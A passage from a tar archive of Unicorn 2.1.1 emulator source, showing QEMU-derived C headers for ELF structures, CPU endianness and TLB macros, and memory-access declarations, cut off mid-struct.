55 #define R_RISCV_SET32 56 /* RISC-V ELF Flags. */ #define EF_RISCV_RVC 0x0001 #define EF_RISCV_FLOAT_ABI 0x0006 #define EF_RISCV_FLOAT_ABI_SOFT 0x0000 #define EF_RISCV_FLOAT_ABI_SINGLE 0x0002 #define EF_RISCV_FLOAT_ABI_DOUBLE 0x0004 #define EF_RISCV_FLOAT_ABI_QUAD 0x0006 #define EF_RISCV_RVE 0x0008 #define EF_RISCV_TSO 0x0010 typedef struct elf32_rel { Elf32_Addr r_offset; Elf32_Word r_info; } Elf32_Rel; typedef struct elf64_rel { Elf64_Addr r_offset; /* Location at which to apply the action */ Elf64_Xword r_info; /* index and type of relocation */ } Elf64_Rel; typedef struct elf32_rela{ Elf32_Addr r_offset; Elf32_Word r_info; Elf32_Sword r_addend; } Elf32_Rela; typedef struct elf64_rela { Elf64_Addr r_offset; /* Location at which to apply the action */ Elf64_Xword r_info; /* index and type of relocation */ Elf64_Sxword r_addend; /* Constant addend used to compute value */ } Elf64_Rela; typedef struct elf32_sym{ Elf32_Word st_name; Elf32_Addr st_value; Elf32_Word st_size; unsigned char st_info; unsigned char st_other; Elf32_Half st_shndx; } Elf32_Sym; typedef struct elf64_sym { Elf64_Word st_name; /* Symbol name, index in string tbl */ unsigned char st_info; /* Type and binding attributes */ unsigned char st_other; /* No defined meaning, 0 */ Elf64_Half st_shndx; /* Associated section index */ Elf64_Addr st_value; /* Value of the symbol */ Elf64_Xword st_size; /* Associated symbol size */ } Elf64_Sym; #define EI_NIDENT 16 /* Special value for e_phnum. This indicates that the real number of program headers is too large to fit into e_phnum. Instead the real value is in the field sh_info of section 0. */ #define PN_XNUM 0xffff typedef struct elf32_hdr{ unsigned char e_ident[EI_NIDENT]; Elf32_Half e_type; Elf32_Half e_machine; Elf32_Word e_version; Elf32_Addr e_entry; /* Entry point */ Elf32_Off e_phoff; Elf32_Off e_shoff; Elf32_Word e_flags; Elf32_Half e_ehsize; Elf32_Half e_phentsize; Elf32_Half e_phnum; Elf32_Half e_shentsize; Elf32_Half e_shnum; Elf32_Half e_shstrndx; } Elf32_Ehdr; typedef struct elf64_hdr { unsigned char e_ident[16]; /* ELF "magic number" */ Elf64_Half e_type; Elf64_Half e_machine; Elf64_Word e_version; Elf64_Addr e_entry; /* Entry point virtual address */ Elf64_Off e_phoff; /* Program header table file offset */ Elf64_Off e_shoff; /* Section header table file offset */ Elf64_Word e_flags; Elf64_Half e_ehsize; Elf64_Half e_phentsize; Elf64_Half e_phnum; Elf64_Half e_shentsize; Elf64_Half e_shnum; Elf64_Half e_shstrndx; } Elf64_Ehdr; /* These constants define the permissions on sections in the program header, p_flags. */ #define PF_R 0x4 #define PF_W 0x2 #define PF_X 0x1 typedef struct elf32_phdr{ Elf32_Word p_type; Elf32_Off p_offset; Elf32_Addr p_vaddr; Elf32_Addr p_paddr; Elf32_Word p_filesz; Elf32_Word p_memsz; Elf32_Word p_flags; Elf32_Word p_align; } Elf32_Phdr; typedef struct elf64_phdr { Elf64_Word p_type; Elf64_Word p_flags; Elf64_Off p_offset; /* Segment file offset */ Elf64_Addr p_vaddr; /* Segment virtual address */ Elf64_Addr p_paddr; /* Segment physical address */ Elf64_Xword p_filesz; /* Segment size in file */ Elf64_Xword p_memsz; /* Segment size in memory */ Elf64_Xword p_align; /* Segment alignment, file & memory */ } Elf64_Phdr; /* sh_type */ #define SHT_NULL 0 #define SHT_PROGBITS 1 #define SHT_SYMTAB 2 #define SHT_STRTAB 3 #define SHT_RELA 4 #define SHT_HASH 5 #define SHT_DYNAMIC 6 #define SHT_NOTE 7 #define SHT_NOBITS 8 #define SHT_REL 9 #define SHT_SHLIB 10 #define SHT_DYNSYM 11 #define SHT_NUM 12 #define SHT_LOPROC 0x70000000 #define SHT_HIPROC 0x7fffffff #define SHT_LOUSER 0x80000000 #define SHT_HIUSER 0xffffffff #define SHT_MIPS_LIST 0x70000000 #define SHT_MIPS_CONFLICT 0x70000002 #define SHT_MIPS_GPTAB 0x70000003 #define SHT_MIPS_UCODE 0x70000004 /* sh_flags */ #define SHF_WRITE 0x1 #define SHF_ALLOC 0x2 #define SHF_EXECINSTR 0x4 #define SHF_MASKPROC 0xf0000000 #define SHF_MIPS_GPREL 0x10000000 /* special section indexes */ #define SHN_UNDEF 0 #define SHN_LORESERVE 0xff00 #define SHN_LOPROC 0xff00 #define SHN_HIPROC 0xff1f #define SHN_ABS 0xfff1 #define SHN_COMMON 0xfff2 #define SHN_HIRESERVE 0xffff #define SHN_MIPS_ACCOMON 0xff00 typedef struct elf32_shdr { Elf32_Word sh_name; Elf32_Word sh_type; Elf32_Word sh_flags; Elf32_Addr sh_addr; Elf32_Off sh_offset; Elf32_Word sh_size; Elf32_Word sh_link; Elf32_Word sh_info; Elf32_Word sh_addralign; Elf32_Word sh_entsize; } Elf32_Shdr; typedef struct elf64_shdr { Elf64_Word sh_name; /* Section name, index in string tbl */ Elf64_Word sh_type; /* Type of section */ Elf64_Xword sh_flags; /* Miscellaneous section attributes */ Elf64_Addr sh_addr; /* Section virtual addr at execution */ Elf64_Off sh_offset; /* Section file offset */ Elf64_Xword sh_size; /* Size of section in bytes */ Elf64_Word sh_link; /* Index of another section */ Elf64_Word sh_info; /* Additional section information */ Elf64_Xword sh_addralign; /* Section alignment */ Elf64_Xword sh_entsize; /* Entry size if section holds table */ } Elf64_Shdr; #define EI_MAG0 0 /* e_ident[] indexes */ #define EI_MAG1 1 #define EI_MAG2 2 #define EI_MAG3 3 #define EI_CLASS 4 #define EI_DATA 5 #define EI_VERSION 6 #define EI_OSABI 7 #define EI_PAD 8 #define ELFOSABI_NONE 0 /* UNIX System V ABI */ #define ELFOSABI_SYSV 0 /* Alias. */ #define ELFOSABI_HPUX 1 /* HP-UX */ #define ELFOSABI_NETBSD 2 /* NetBSD. */ #define ELFOSABI_LINUX 3 /* Linux. */ #define ELFOSABI_SOLARIS 6 /* Sun Solaris. */ #define ELFOSABI_AIX 7 /* IBM AIX. */ #define ELFOSABI_IRIX 8 /* SGI Irix. */ #define ELFOSABI_FREEBSD 9 /* FreeBSD. */ #define ELFOSABI_TRU64 10 /* Compaq TRU64 UNIX. */ #define ELFOSABI_MODESTO 11 /* Novell Modesto. */ #define ELFOSABI_OPENBSD 12 /* OpenBSD. */ #define ELFOSABI_ARM_FDPIC 65 /* ARM FDPIC */ #define ELFOSABI_ARM 97 /* ARM */ #define ELFOSABI_STANDALONE 255 /* Standalone (embedded) application */ #define ELFMAG0 0x7f /* EI_MAG */ #define ELFMAG1 'E' #define ELFMAG2 'L' #define ELFMAG3 'F' #define ELFMAG "\177ELF" #define SELFMAG 4 #define ELFCLASSNONE 0 /* EI_CLASS */ #define ELFCLASS32 1 #define ELFCLASS64 2 #define ELFCLASSNUM 3 #define ELFDATANONE 0 /* e_ident[EI_DATA] */ #define ELFDATA2LSB 1 #define ELFDATA2MSB 2 #define EV_NONE 0 /* e_version, EI_VERSION */ #define EV_CURRENT 1 #define EV_NUM 2 /* Notes used in ET_CORE */ #define NT_PRSTATUS 1 #define NT_FPREGSET 2 #define NT_PRFPREG 2 #define NT_PRPSINFO 3 #define NT_TASKSTRUCT 4 #define NT_AUXV 6 #define NT_PRXFPREG 0x46e62b7f /* copied from gdb5.1/include/elf/common.h */ #define NT_S390_GS_CB 0x30b /* s390 guarded storage registers */ #define NT_S390_VXRS_HIGH 0x30a /* s390 vector registers 16-31 */ #define NT_S390_VXRS_LOW 0x309 /* s390 vector registers 0-15 (lower half) */ #define NT_S390_PREFIX 0x305 /* s390 prefix register */ #define NT_S390_CTRS 0x304 /* s390 control registers */ #define NT_S390_TODPREG 0x303 /* s390 TOD programmable register */ #define NT_S390_TODCMP 0x302 /* s390 TOD clock comparator register */ #define NT_S390_TIMER 0x301 /* s390 timer register */ #define NT_PPC_VMX 0x100 /* PowerPC Altivec/VMX registers */ #define NT_PPC_SPE 0x101 /* PowerPC SPE/EVR registers */ #define NT_PPC_VSX 0x102 /* PowerPC VSX registers */ #define NT_ARM_VFP 0x400 /* ARM VFP/NEON registers */ #define NT_ARM_TLS 0x401 /* ARM TLS register */ #define NT_ARM_HW_BREAK 0x402 /* ARM hardware breakpoint registers */ #define NT_ARM_HW_WATCH 0x403 /* ARM hardware watchpoint registers */ #define NT_ARM_SYSTEM_CALL 0x404 /* ARM system call number */ #define NT_ARM_SVE 0x405 /* ARM Scalable Vector Extension regs */ /* * Physical entry point into the kernel. * * 32bit entry point into the kernel. When requested to launch the * guest kernel, use this entry point to launch the guest in 32-bit * protected mode with paging disabled. * * [ Corresponding definition in Linux kernel: include/xen/interface/elfnote.h ] */ #define XEN_ELFNOTE_PHYS32_ENTRY 18 /* 0x12 */ /* Note header in a PT_NOTE section */ typedef struct elf32_note { Elf32_Word n_namesz; /* Name size */ Elf32_Word n_descsz; /* Content size */ Elf32_Word n_type; /* Content type */ } Elf32_Nhdr; /* Note header in a PT_NOTE section */ typedef struct elf64_note { Elf64_Word n_namesz; /* Name size */ Elf64_Word n_descsz; /* Content size */ Elf64_Word n_type; /* Content type */ } Elf64_Nhdr; /* This data structure represents a PT_LOAD segment. */ struct elf32_fdpic_loadseg { /* Core address to which the segment is mapped. */ Elf32_Addr addr; /* VMA recorded in the program header. */ Elf32_Addr p_vaddr; /* Size of this segment in memory. */ Elf32_Word p_memsz; }; struct elf32_fdpic_loadmap { /* Protocol version number, must be zero. */ Elf32_Half version; /* Number of segments in this map. */ Elf32_Half nsegs; /* The actual memory map. */ struct elf32_fdpic_loadseg segs[/*nsegs*/]; }; #ifdef ELF_CLASS #if ELF_CLASS == ELFCLASS32 #define elfhdr elf32_hdr #define elf_phdr elf32_phdr #define elf_note elf32_note #define elf_shdr elf32_shdr #define elf_sym elf32_sym #define elf_addr_t Elf32_Off #define elf_rela elf32_rela #ifdef ELF_USES_RELOCA # define ELF_RELOC Elf32_Rela #else # define ELF_RELOC Elf32_Rel #endif #else #define elfhdr elf64_hdr #define elf_phdr elf64_phdr #define elf_note elf64_note #define elf_shdr elf64_shdr #define elf_sym elf64_sym #define elf_addr_t Elf64_Off #define elf_rela elf64_rela #ifdef ELF_USES_RELOCA # define ELF_RELOC Elf64_Rela #else # define ELF_RELOC Elf64_Rel #endif #endif /* ELF_CLASS */ #ifndef ElfW # if ELF_CLASS == ELFCLASS32 # define ElfW(x) Elf32_ ## x # define ELFW(x) ELF32_ ## x # else # define ElfW(x) Elf64_ ## x # define ELFW(x) ELF64_ ## x # endif #endif #endif /* ELF_CLASS */ #endif /* QEMU_ELF_H */ ���������unicorn-2.1.1/qemu/include/exec/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016522�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/cpu-all.h�����������������������������������������������������������0000664�0000000�0000000�00000030507�14675241067�0020235�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * defines common to all virtual CPUs * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef CPU_ALL_H #define CPU_ALL_H #include "exec/cpu-common.h" #include "exec/memory.h" #include "qemu/thread.h" #include "hw/core/cpu.h" #include <uc_priv.h> #if 0 #include "qemu/rcu.h" #endif #define EXCP_INTERRUPT 0x10000 /* async interruption */ #define EXCP_HLT 0x10001 /* hlt instruction reached */ #define EXCP_DEBUG 0x10002 /* cpu stopped after a breakpoint or singlestep */ #define EXCP_HALTED 0x10003 /* cpu is halted (waiting for external event) */ #define EXCP_YIELD 0x10004 /* cpu wants to yield timeslice to another */ #define EXCP_ATOMIC 0x10005 /* stop-the-world and emulate atomic */ /* some important defines: * * HOST_WORDS_BIGENDIAN : if defined, the host cpu is big endian and * otherwise little endian. * * TARGET_WORDS_BIGENDIAN : same for target cpu */ #if defined(HOST_WORDS_BIGENDIAN) != defined(TARGET_WORDS_BIGENDIAN) #define BSWAP_NEEDED #endif #ifdef BSWAP_NEEDED static inline uint16_t tswap16(uint16_t s) { return bswap16(s); } static inline uint32_t tswap32(uint32_t s) { return bswap32(s); } static inline uint64_t tswap64(uint64_t s) { return bswap64(s); } static inline void tswap16s(uint16_t *s) { *s = bswap16(*s); } static inline void tswap32s(uint32_t *s) { *s = bswap32(*s); } static inline void tswap64s(uint64_t *s) { *s = bswap64(*s); } #else static inline uint16_t tswap16(uint16_t s) { return s; } static inline uint32_t tswap32(uint32_t s) { return s; } static inline uint64_t tswap64(uint64_t s) { return s; } static inline void tswap16s(uint16_t *s) { } static inline void tswap32s(uint32_t *s) { } static inline void tswap64s(uint64_t *s) { } #endif #if TARGET_LONG_SIZE == 4 #define tswapl(s) tswap32(s) #define tswapls(s) tswap32s((uint32_t *)(s)) #define bswaptls(s) bswap32s(s) #else #define tswapl(s) tswap64(s) #define tswapls(s) tswap64s((uint64_t *)(s)) #define bswaptls(s) bswap64s(s) #endif /* Target-endianness CPU memory access functions. These fit into the * {ld,st}{type}{sign}{size}{endian}_p naming scheme described in bswap.h. */ #if defined(TARGET_WORDS_BIGENDIAN) #define lduw_p(p) lduw_be_p(p) #define ldsw_p(p) ldsw_be_p(p) #define ldl_p(p) ldl_be_p(p) #define ldq_p(p) ldq_be_p(p) #define ldfl_p(p) ldfl_be_p(p) #define ldfq_p(p) ldfq_be_p(p) #define stw_p(p, v) stw_be_p(p, v) #define stl_p(p, v) stl_be_p(p, v) #define stq_p(p, v) stq_be_p(p, v) #define stfl_p(p, v) stfl_be_p(p, v) #define stfq_p(p, v) stfq_be_p(p, v) #define ldn_p(p, sz) ldn_be_p(p, sz) #define stn_p(p, sz, v) stn_be_p(p, sz, v) #else #define lduw_p(p) lduw_le_p(p) #define ldsw_p(p) ldsw_le_p(p) #define ldl_p(p) ldl_le_p(p) #define ldq_p(p) ldq_le_p(p) #define ldfl_p(p) ldfl_le_p(p) #define ldfq_p(p) ldfq_le_p(p) #define stw_p(p, v) stw_le_p(p, v) #define stl_p(p, v) stl_le_p(p, v) #define stq_p(p, v) stq_le_p(p, v) #define stfl_p(p, v) stfl_le_p(p, v) #define stfq_p(p, v) stfq_le_p(p, v) #define ldn_p(p, sz) ldn_le_p(p, sz) #define stn_p(p, sz, v) stn_le_p(p, sz, v) #endif /* MMU memory access macros */ #include "exec/hwaddr.h" #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX UNICORN_ARCH_POSTFIX #else #define SUFFIX #endif #define ARG1 as #define ARG1_DECL AddressSpace *as #define TARGET_ENDIANNESS #include "exec/memory_ldst.inc.h" #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX glue(_cached_slow, UNICORN_ARCH_POSTFIX) #else #define SUFFIX _cached_slow #endif #define ARG1 cache #define ARG1_DECL MemoryRegionCache *cache #define TARGET_ENDIANNESS #include "exec/memory_ldst.inc.h" static inline void stl_phys_notdirty(AddressSpace *as, hwaddr addr, uint32_t val) { #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stl_notdirty, UNICORN_ARCH_POSTFIX) (as->uc, as, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); #else address_space_stl_notdirty(as->uc, as, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); #endif } #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX UNICORN_ARCH_POSTFIX #else #define SUFFIX #endif #define ARG1 as #define ARG1_DECL AddressSpace *as #define TARGET_ENDIANNESS #include "exec/memory_ldst_phys.inc.h" /* Inline fast path for direct RAM access. */ #define ENDIANNESS #include "exec/memory_ldst_cached.inc.h" #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX glue(_cached, UNICORN_ARCH_POSTFIX) #else #define SUFFIX _cached #endif #define ARG1 cache #define ARG1_DECL MemoryRegionCache *cache #define TARGET_ENDIANNESS #include "exec/memory_ldst_phys.inc.h" /* page related stuff */ #ifdef TARGET_PAGE_BITS_VARY typedef struct TargetPageBits { bool decided; int bits; target_long mask; } TargetPageBits; #if defined(CONFIG_ATTRIBUTE_ALIAS) || !defined(IN_EXEC_VARY) extern const TargetPageBits target_page; #else extern TargetPageBits target_page; #endif #ifdef CONFIG_DEBUG_TCG #define TARGET_PAGE_BITS ({ assert(target_page.decided); target_page.bits; }) #define TARGET_PAGE_MASK ({ assert(target_page.decided); target_page.mask; }) #else #define TARGET_PAGE_BITS uc->init_target_page->bits #define TARGET_PAGE_MASK uc->init_target_page->mask #endif #define TARGET_PAGE_SIZE (-(int)TARGET_PAGE_MASK) // qq #else #define TARGET_PAGE_BITS_MIN TARGET_PAGE_BITS #define TARGET_PAGE_SIZE (1 << TARGET_PAGE_BITS) #define TARGET_PAGE_MASK ((target_ulong)-1 << TARGET_PAGE_BITS) #endif #define TARGET_PAGE_ALIGN(addr) ROUND_UP((addr), TARGET_PAGE_SIZE) #define HOST_PAGE_ALIGN(uc, addr) ROUND_UP((addr), uc->qemu_host_page_size) #if 0 #define REAL_HOST_PAGE_ALIGN(addr) ROUND_UP((addr), uc->qemu_real_host_page_size) #endif /* same as PROT_xxx */ #define PAGE_READ 0x0001 #define PAGE_WRITE 0x0002 #define PAGE_EXEC 0x0004 #define PAGE_BITS (PAGE_READ | PAGE_WRITE | PAGE_EXEC) #define PAGE_VALID 0x0008 /* original state of the write flag (used when tracking self-modifying code */ #define PAGE_WRITE_ORG 0x0010 /* Invalidate the TLB entry immediately, helpful for s390x * Low-Address-Protection. Used with PAGE_WRITE in tlb_set_page_with_attrs() */ #define PAGE_WRITE_INV 0x0040 CPUArchState *cpu_copy(CPUArchState *env); /* Flags for use in ENV->INTERRUPT_PENDING. The numbers assigned here are non-sequential in order to preserve binary compatibility with the vmstate dump. Bit 0 (0x0001) was previously used for CPU_INTERRUPT_EXIT, and is cleared when loading the vmstate dump. */ /* External hardware interrupt pending. This is typically used for interrupts from devices. */ #define CPU_INTERRUPT_HARD 0x0002 /* Exit the current TB. This is typically used when some system-level device makes some change to the memory mapping. E.g. the a20 line change. */ #define CPU_INTERRUPT_EXITTB 0x0004 /* Halt the CPU. */ #define CPU_INTERRUPT_HALT 0x0020 /* Debug event pending. */ #define CPU_INTERRUPT_DEBUG 0x0080 /* Reset signal. */ #define CPU_INTERRUPT_RESET 0x0400 /* Several target-specific external hardware interrupts. Each target/cpu.h should define proper names based on these defines. */ #define CPU_INTERRUPT_TGT_EXT_0 0x0008 #define CPU_INTERRUPT_TGT_EXT_1 0x0010 #define CPU_INTERRUPT_TGT_EXT_2 0x0040 #define CPU_INTERRUPT_TGT_EXT_3 0x0200 #define CPU_INTERRUPT_TGT_EXT_4 0x1000 /* Several target-specific internal interrupts. These differ from the preceding target-specific interrupts in that they are intended to originate from within the cpu itself, typically in response to some instruction being executed. These, therefore, are not masked while single-stepping within the debugger. */ #define CPU_INTERRUPT_TGT_INT_0 0x0100 #define CPU_INTERRUPT_TGT_INT_1 0x0800 #define CPU_INTERRUPT_TGT_INT_2 0x2000 /* First unused bit: 0x4000. */ /* The set of all bits that should be masked when single-stepping. */ #define CPU_INTERRUPT_SSTEP_MASK \ (CPU_INTERRUPT_HARD \ | CPU_INTERRUPT_TGT_EXT_0 \ | CPU_INTERRUPT_TGT_EXT_1 \ | CPU_INTERRUPT_TGT_EXT_2 \ | CPU_INTERRUPT_TGT_EXT_3 \ | CPU_INTERRUPT_TGT_EXT_4) /* * Flags stored in the low bits of the TLB virtual address. * These are defined so that fast path ram access is all zeros. * The flags all must be between TARGET_PAGE_BITS and * maximum address alignment bit. * * Use TARGET_PAGE_BITS_MIN so that these bits are constant * when TARGET_PAGE_BITS_VARY is in effect. */ /* Zero if TLB entry is valid. */ #define TLB_INVALID_MASK (1 << (TARGET_PAGE_BITS_MIN - 1)) /* Set if TLB entry references a clean RAM page. The iotlb entry will contain the page physical address. */ #define TLB_NOTDIRTY (1 << (TARGET_PAGE_BITS_MIN - 2)) /* Set if TLB entry is an IO callback. */ #define TLB_MMIO (1 << (TARGET_PAGE_BITS_MIN - 3)) /* Set if TLB entry contains a watchpoint. */ #define TLB_WATCHPOINT (1 << (TARGET_PAGE_BITS_MIN - 4)) /* Set if TLB entry requires byte swap. */ #define TLB_BSWAP (1 << (TARGET_PAGE_BITS_MIN - 5)) /* Set if TLB entry writes ignored. */ #define TLB_DISCARD_WRITE (1 << (TARGET_PAGE_BITS_MIN - 6)) /* Use this mask to check interception with an alignment mask * in a TCG backend. */ #define TLB_FLAGS_MASK \ (TLB_INVALID_MASK | TLB_NOTDIRTY | TLB_MMIO \ | TLB_WATCHPOINT | TLB_BSWAP | TLB_DISCARD_WRITE) /** * tlb_hit_page: return true if page aligned @addr is a hit against the * TLB entry @tlb_addr * * @addr: virtual address to test (must be page aligned) * @tlb_addr: TLB entry address (a CPUTLBEntry addr_read/write/code value) */ static inline bool tlb_hit_page(struct uc_struct *uc, target_ulong tlb_addr, target_ulong addr) { return addr == (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK)); } /** * tlb_hit: return true if @addr is a hit against the TLB entry @tlb_addr * * @addr: virtual address to test (need not be page aligned) * @tlb_addr: TLB entry address (a CPUTLBEntry addr_read/write/code value) */ static inline bool tlb_hit(struct uc_struct *uc, target_ulong tlb_addr, target_ulong addr) { return tlb_hit_page(uc, tlb_addr, addr & TARGET_PAGE_MASK); } int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, void *ptr, target_ulong len, bool is_write); int cpu_exec(struct uc_struct *uc, CPUState *cpu); /** * cpu_set_cpustate_pointers(cpu) * @cpu: The cpu object * * Set the generic pointers in CPUState into the outer object. */ static inline void cpu_set_cpustate_pointers(ArchCPU *cpu) { cpu->parent_obj.env_ptr = &cpu->env; cpu->parent_obj.icount_decr_ptr = &cpu->neg.icount_decr; } /** * env_archcpu(env) * @env: The architecture environment * * Return the ArchCPU associated with the environment. */ static inline ArchCPU *env_archcpu(CPUArchState *env) { return container_of(env, ArchCPU, env); } /** * env_cpu(env) * @env: The architecture environment * * Return the CPUState associated with the environment. */ static inline CPUState *env_cpu(CPUArchState *env) { return &env_archcpu(env)->parent_obj; } /** * env_neg(env) * @env: The architecture environment * * Return the CPUNegativeOffsetState associated with the environment. */ static inline CPUNegativeOffsetState *env_neg(CPUArchState *env) { ArchCPU *arch_cpu = container_of(env, ArchCPU, env); return &arch_cpu->neg; } /** * cpu_neg(cpu) * @cpu: The generic CPUState * * Return the CPUNegativeOffsetState associated with the cpu. */ static inline CPUNegativeOffsetState *cpu_neg(CPUState *cpu) { ArchCPU *arch_cpu = container_of(cpu, ArchCPU, parent_obj); return &arch_cpu->neg; } /** * env_tlb(env) * @env: The architecture environment * * Return the CPUTLB state associated with the environment. */ static inline CPUTLB *env_tlb(CPUArchState *env) { return &env_neg(env)->tlb; } #endif /* CPU_ALL_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/cpu-common.h��������������������������������������������������������0000664�0000000�0000000�00000005017�14675241067�0020753�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef CPU_COMMON_H #define CPU_COMMON_H /* CPU interfaces that are target independent. */ #include "exec/hwaddr.h" /* The CPU list lock nests outside page_(un)lock or mmap_(un)lock */ void qemu_init_cpu_list(void); void cpu_list_lock(void); void cpu_list_unlock(void); void tcg_flush_softmmu_tlb(struct uc_struct *uc); enum device_endian { DEVICE_NATIVE_ENDIAN, DEVICE_BIG_ENDIAN, DEVICE_LITTLE_ENDIAN, }; #if defined(HOST_WORDS_BIGENDIAN) #define DEVICE_HOST_ENDIAN DEVICE_BIG_ENDIAN #else #define DEVICE_HOST_ENDIAN DEVICE_LITTLE_ENDIAN #endif /* address in the RAM (different from a physical address) */ typedef uintptr_t ram_addr_t; # define RAM_ADDR_MAX UINTPTR_MAX # define RAM_ADDR_FMT "%" PRIxPTR /* memory API */ typedef void CPUWriteMemoryFunc(void *opaque, hwaddr addr, uint32_t value); typedef uint32_t CPUReadMemoryFunc(void *opaque, hwaddr addr); /* This should not be used by devices. */ ram_addr_t qemu_ram_addr_from_host(struct uc_struct *uc, void *ptr); RAMBlock *qemu_ram_block_from_host(struct uc_struct *uc, void *ptr, bool round_offset, ram_addr_t *offset); ram_addr_t qemu_ram_block_host_offset(RAMBlock *rb, void *host); void *qemu_ram_get_host_addr(RAMBlock *rb); ram_addr_t qemu_ram_get_offset(RAMBlock *rb); ram_addr_t qemu_ram_get_used_length(RAMBlock *rb); bool qemu_ram_is_shared(RAMBlock *rb); size_t qemu_ram_pagesize(RAMBlock *block); size_t qemu_ram_pagesize_largest(void); bool cpu_physical_memory_rw(AddressSpace *as, hwaddr addr, void *buf, hwaddr len, bool is_write); static inline void cpu_physical_memory_read(AddressSpace *as, hwaddr addr, void *buf, hwaddr len) { cpu_physical_memory_rw(as, addr, buf, len, false); } static inline void cpu_physical_memory_write(AddressSpace *as, hwaddr addr, const void *buf, hwaddr len) { cpu_physical_memory_rw(as, addr, (void *)buf, len, true); } void *cpu_physical_memory_map(AddressSpace *as, hwaddr addr, hwaddr *plen, bool is_write); void cpu_physical_memory_unmap(AddressSpace *as, void *buffer, hwaddr len, bool is_write, hwaddr access_len); bool cpu_physical_memory_is_io(AddressSpace *as, hwaddr phys_addr); void cpu_flush_icache_range(AddressSpace *as, hwaddr start, hwaddr len); int ram_block_discard_range(struct uc_struct *uc, RAMBlock *rb, uint64_t start, size_t length); #endif /* CPU_COMMON_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/cpu-defs.h����������������������������������������������������������0000664�0000000�0000000�00000016357�14675241067�0020415�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * common defines for all CPUs * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef CPU_DEFS_H #define CPU_DEFS_H #ifndef NEED_CPU_H #error cpu.h included from common code #endif #include "qemu/host-utils.h" #include "qemu/thread.h" #include "tcg-target.h" #include "exec/hwaddr.h" #include "exec/memattrs.h" #include "hw/core/cpu.h" #include "cpu-param.h" #ifndef TARGET_LONG_BITS # error TARGET_LONG_BITS must be defined in cpu-param.h #endif #ifndef NB_MMU_MODES # error NB_MMU_MODES must be defined in cpu-param.h #endif #ifndef TARGET_PHYS_ADDR_SPACE_BITS # error TARGET_PHYS_ADDR_SPACE_BITS must be defined in cpu-param.h #endif #ifndef TARGET_VIRT_ADDR_SPACE_BITS # error TARGET_VIRT_ADDR_SPACE_BITS must be defined in cpu-param.h #endif #ifndef TARGET_PAGE_BITS # ifdef TARGET_PAGE_BITS_VARY # ifndef TARGET_PAGE_BITS_MIN # error TARGET_PAGE_BITS_MIN must be defined in cpu-param.h # endif # else # error TARGET_PAGE_BITS must be defined in cpu-param.h # endif #endif #define TARGET_LONG_SIZE (TARGET_LONG_BITS / 8) /* target_ulong is the type of a virtual address */ #if TARGET_LONG_SIZE == 4 typedef int32_t target_long; typedef uint32_t target_ulong; #define TARGET_FMT_lx "%08x" #define TARGET_FMT_ld "%d" #define TARGET_FMT_lu "%u" #elif TARGET_LONG_SIZE == 8 typedef int64_t target_long; typedef uint64_t target_ulong; #define TARGET_FMT_lx "%016" PRIx64 #define TARGET_FMT_ld "%" PRId64 #define TARGET_FMT_lu "%" PRIu64 #else #error TARGET_LONG_SIZE undefined #endif /* use a fully associative victim tlb of 8 entries */ #define CPU_VTLB_SIZE 8 #if HOST_LONG_BITS == 32 && TARGET_LONG_BITS == 32 #define CPU_TLB_ENTRY_BITS 5 #else #define CPU_TLB_ENTRY_BITS 6 #endif #define CPU_TLB_DYN_MIN_BITS 6 #define CPU_TLB_DYN_DEFAULT_BITS 8 # if HOST_LONG_BITS == 32 /* Make sure we do not require a double-word shift for the TLB load */ # define CPU_TLB_DYN_MAX_BITS (32 - TARGET_PAGE_BITS) # else /* HOST_LONG_BITS == 64 */ /* * Assuming TARGET_PAGE_BITS==12, with 2**22 entries we can cover 2**(22+12) == * 2**34 == 16G of address space. This is roughly what one would expect a * TLB to cover in a modern (as of 2018) x86_64 CPU. For instance, Intel * Skylake's Level-2 STLB has 16 1G entries. * Also, make sure we do not size the TLB past the guest's address space. */ # define CPU_TLB_DYN_MAX_BITS \ MIN(22, TARGET_VIRT_ADDR_SPACE_BITS - TARGET_PAGE_BITS) # endif typedef struct CPUTLBEntry { /* bit TARGET_LONG_BITS to TARGET_PAGE_BITS : virtual address bit TARGET_PAGE_BITS-1..4 : Nonzero for accesses that should not go directly to ram. bit 3 : indicates that the entry is invalid bit 2..0 : zero */ union { struct { target_ulong addr_read; target_ulong addr_write; 